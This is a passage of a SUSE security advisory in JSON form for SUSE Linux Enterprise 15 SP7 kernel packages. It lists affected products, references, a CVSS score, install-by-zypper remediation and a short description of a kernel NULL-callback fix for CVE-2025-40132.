"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: Intel: sof_sdw: Prevent jump to NULL add_sidecar callback\n\nIn create_sdw_dailink() check that sof_end-\u003ecodec_info-\u003eadd_sidecar\nis not NULL before calling it.\n\nThe original code assumed that if include_sidecar is true, the codec\non that link has an add_sidecar callback. But there could be other\ncodecs on the same link that do not have an add_sidecar callback.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40132",
"url": "https://www.suse.com/security/cve/CVE-2025-40132"
},
{
"category": "external",
"summary": "SUSE Bug 1253330 for CVE-2025-40132",
"url": "https://bugzilla.suse.com/1253330"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
